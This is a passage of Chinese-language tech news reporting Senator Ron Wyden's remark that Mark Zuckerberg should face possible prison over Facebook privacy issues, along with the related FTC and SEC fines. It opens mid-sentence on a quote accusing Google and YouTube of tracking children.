James)表示,谷歌和YouTube“滥用了自身力量”。他指出:“谷歌和YouTube在知情的情况下非法监控和追踪儿童信息,并向其提供靶向广告,只是为了能让广告收入滚滚而来。”   (稿源:,稿件以及封面源自网络。)

FB 屡爆隐私问题 美参议员认为扎克伯格应面临监禁

北京时间9月4日早间消息,据外媒报道,美国参议员罗恩·怀登(Ron Wyden)在接受Willamette Week采访的时候表示,他认为马克·扎克伯格(Mark Zuckerberg)应该因为在Facebook隐私问题上对美国公民撒谎而面临监禁。 在采访中这位参议员说到:“在隐私问题上,马克·扎克伯格一再向美国人民说谎。我认为他应该被追究个人责任,包括财务罚款,以及——我想特别强调这一点——入狱的可能。因为他伤害了很多的人。顺便说一句,类似的事情是有先例的:在金融服务业中,如果企业CEO和高管在财务方面说话,他们可以被追究个人责任。“ Willamette Week援引俄勒冈大学教授蒂姆·格里森(Tim Gleason)的话说:“采取刑事行动的可能性非常小。“扎克伯格此前曾回避了股东提出的他是否愿意辞去Facebook CEO或董事长的提问。 2018年参议员怀登曾提出了一项名为《消费者数据保护法案(Consumer Data Protection Act)》的法案。该法案将赋予联邦贸易委员会(FTC)对侵犯消费者隐私的企业进行更严厉地打击的权力。方案规定,如果企业侵犯了消费者的隐私,其高管有可能面临最高达20年的监禁和最高500万美元的个人罚款。 2018年3月,FTC开始对该公司的隐私行为开始调查。今年7月,FTC对Facebook处以50亿美元的罚款,这也是FTC向科技企业所开出的金额最高的罚单。FTC所调查的重点为一次大规模数据入侵事件,这起事件中,剑桥分析(Cambridge Analytics)获取了8700万Facebook用户的隐私数据。FTC表示,Facebook公司应该在他们的数据被第三方机构使用时对用户进行告知。 美国证券交易委员会(SEC)也宣布,Facebook将向他们支付1亿美元的罚款,原因是该公司在滥用用户数据所导致的风险方面对投资人进行了误导。今年7月SEC表示:“在两年多的时间里,Facebook明知有第三方开发者滥用了用户数据,但是在该公司的公开披露文件中,他们却称用户数据滥用所导致的风险仅仅是一个假设。”   (稿源:,稿件以及封面源自网络。)